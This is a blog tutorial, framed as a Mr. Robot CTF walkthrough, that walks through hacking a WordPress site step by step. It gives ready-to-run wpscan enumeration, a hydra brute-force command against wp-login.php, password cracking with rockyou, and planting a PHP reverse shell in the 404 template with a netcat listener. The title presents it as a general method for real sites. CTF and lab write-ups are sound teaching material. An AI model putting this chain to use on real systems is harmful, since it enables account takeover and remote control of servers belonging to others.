How to hack a WordPress Website

Welcome back fellow security enthusiasts! Today I will show you how to hack a WordPress Website using the Mr. Robot CTF as an example. I have just worked through this excellent CTF myself and learned a ton in the process. I wanted to level up my Web Vulnerability Analysis game a notch and started with this CTF.

A CTF is a so-called Capture the Flag game, where your goal is to collect a certain number of flags (or keys, for that matter). CTF’s are used to practice your hacking skills in a safe and legal environment. I can recommend Vulnhub as a resource for a selection of an excellent CTF’s.

Ok, let’s get started.

 

Step 1 – Evaluating if a Website is using WordPress

If you don’t know if a Website is using WordPress or not, there mostly is a very easy way to find that out.

You can simply type: www.addressofthewebsite.com/wp-admin

Which in most cases will bring up a wp-admin login gui, except the admin has disabled it.

Another great way to check if a Website is running WordPress is by using wpscan. Wpscan comes pre-installed in both Kali and ParrotSec.

wpscan -u www.addressofyourtarget.com

In my case, scanning the Mr. Robot VM reveals the following.

How to hack wordpress
A snippet of the results

 

As you can see, it clearly indicates that the site is using WordPress. Also, it presents you with 46 identified vulnerabilities. Now, most hosters and recent versions of WordPress will block a scan like this by default. So most likely this is only going to work with outdated WordPress versions without any protection from a hoster.

Ok, so far so good. Now we can verify that by checking if the login page exists by navigating to the website URL + /wp-admin like so:

How to hack wordpress
WordPress Login

And sure enough, the Login mask comes up.

 

Step 2 – Grabbing Code with Burpsuite

Now comes the difficult part, finding out the username. You could start with admin, but WordPress usually generates a random username, so it might be difficult to figure out and you might need to do some further research on the target.

In the Mr. Robot example, I know that the username is Elliot (not too hard to guess). You could also try to run hydra against a couple of username lists, but first, we need to use burpsuite to grab some code from the login page.

Start burpsuite by typing

sudo burpsuite

Create a new Temporary Project using the Burp defaults.

Navigate to the Target -> Scope Tab and click on Add to Include the wp-login page to the scope. Select Yes in the pop-up dialogue.

How to hack WordPress
Adding the site to the scope

 

Next, go to the Preferences Menu of Firefox and scroll all the way down until you find Network Proxy. Click on Settings.

Select Manual proxy configuration and enter the IP 127.0.0.1 and the port 8080. Tick “Use this proxy server for all protocols”. Click OK.

How to hack WordPress
Adding a Proxy

Back to Burpsuite. Open the Proxy Tab. Now back to the WP-Login page. Enter any random username and password and click Log In. Make sure Privacy Badger, uBlock Origins, and NoScript are disabled for the site.

Once you clicked on login, go back to Burpsuite and look at the output.

How to hack WordPress
Grabbing Code
log=root&pwd=1234&wp-submit=Log+In&redirect_to=http%3A%2F%2F192.168.1.109%2Fwp-admin%2F&testcookie=1

 

Now we got something we can feed to Hydra.

 

Step 3 – Finding the correct Username

Let’s have a little bit of fun to give you an idea how you could find out a username for your target. The VM we are using for this example, as mentioned above, is Mr. Robot themed. So it’s very likely that the username will be found in some trivia that has to do with Mr. Robot.

First go back to your Burpsuite and close it. We don’t need it any more right now. Also go back to your Proxy settings and disable the Proxy again.

Now I head to the Mr. Robot Wikipedia page: https://en.wikipedia.org/wiki/Mr._Robot

And I will create a username list from this exact page using CeWL.

Open a new Terminal Window and type

sudo cewl -w usernames.txt -d1 -m4 https://en.wikipedia.org/wiki/Mr._Robot

Let’s break this down.

  • -w usernames.txt – should be pretty clear, this is the name of the wordlist that will be created
  • -d1 – Defines the depth in which CeWL will crawl the website. 1 indicates that it will stay on this exact site and not open any links on it.
  • -m4 – Defines the minimum length of the word that will be put in the list
  • https://en.wikipedia.org/wiki/Mr._Robot – obviously the website we are going to crawl.

So as you see, you could apply this technique to any target relevant website.

Running a quick

ls

Shows us, that our usernames.txt was created.

How to hack WordPress
Checking the CeWL output

 

In some cases you get lucky using wpscan to enumerate the username, so always try this too:

wpscan --url http://www.targetwebsite.com --enumerate u

Now we are going to use Hydra to Bruteforce this list against the wp-login page.

 

Step 4 – BruteforcingĀ  Usernames with Hydra

Alright, time to feed the Usernames to our Hydra. I found this particular method on one of the many Walkthroughs from Vulnhub, although don’t remember exactly which one it was, but I give credit where credit is due. Open a new terminal window and type:

hydra -V -L usernames.txt -p whatever 192.168.1.109 http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log:F=Invalid username'

Let’s break this down.

  • -V – Verbose
  • -L – Our usernames.txt list
  • -p whatever – The password, we don’t care, because we want to find out the username
    • http-post-form – The type of Brute Force attack we want to run
    • /wp-login.php – The path to the login form
    • log = ^USER^&pwd=^PASS^&wp-submit=Log+In – The values that will be sent to the form, where ^USER^ and ^PASS^ are placeholders for our -L and -p options
    • F=Invalid username – Tells hydra that the attempt failed if it returns Invalid username

Alright, let’s run that command, shall we?

 

How to hack WordPress
Hydra results

 

And sure enough, we get returned that the login with the username elliot was successful (Which it wasn’t, it just confirmed that the web form didn’t return invalid username).

So we still need to figure out the password. But at least we have a username.

 

Step 5 – Brute Forcing the Password

Now we could also use Hydra to Brute Force the User’s password, but I prefer using wpscan as the syntax is easier.

wpscan --url http://192.168.1.109/wp-login.php --wordlist /usr/share/wordlists/rockyou.txt.gz --username elliot --wp-content-dir http://192.168.1.109/wp-login.php

rockyou.txt.gz is just an example, replace with whatever password list you want to use.

And voila, we got the Username and the Password.

Capturing the password

 

 

Step 6 – Implementing malicious Code into WordPress

Alright, now that we got Admin Access to WordPress, there are a couple of ways we can go from here. I will show you one of the easier ones.

On your Attacking Computer go to Places -> File System -> usr -> share -> webshells -> php and open php-reverse-shell.php

Copy all of it’s content:

How to hack wordpress
Copy the text

 

Now in WordPress, navigate to Appearance -> Editor and select the 404.php Template. This is just an example, you can implement the code in many different ways.

Now paste your code in here so it looks something like this:

How to hack WordPress
Edit the yellow marked lines

Edit the lines marked in yellow so the IP points to your attacking computer and choose a port.

 

Step 7 – Starting a Netcat listener

Now back on the attacking computer, we start a Netcat listener:

nc -lvp 443

Then you are going to open the 404 page like just going to the link: www.yourtargetwebsite.com/404

How to hack WordPress
Connection established

 

And we are in! Not only did we hack the WordPress Admin Account, we also got access to the Server itself. From here you need to use your skills to gain elevated access, but that shouldn’t be too hard anymore now.

You can see, CTF’s are a great way to learn new stuff.

Until next time, keep on hacking!

 

*All the techniques provided in the tutorials on ceos3c.com are solely meant for educational purposes only.
All of the techniques taught here are only meant to be used in a closed laboratory environment or in consent with a second party.
If you are using any of those techniques for illegal purposes, Ceos3c can’t be held responsible for possible lawful consequences.

4 thoughts on “How to hack a WordPress Website

Leave a Reply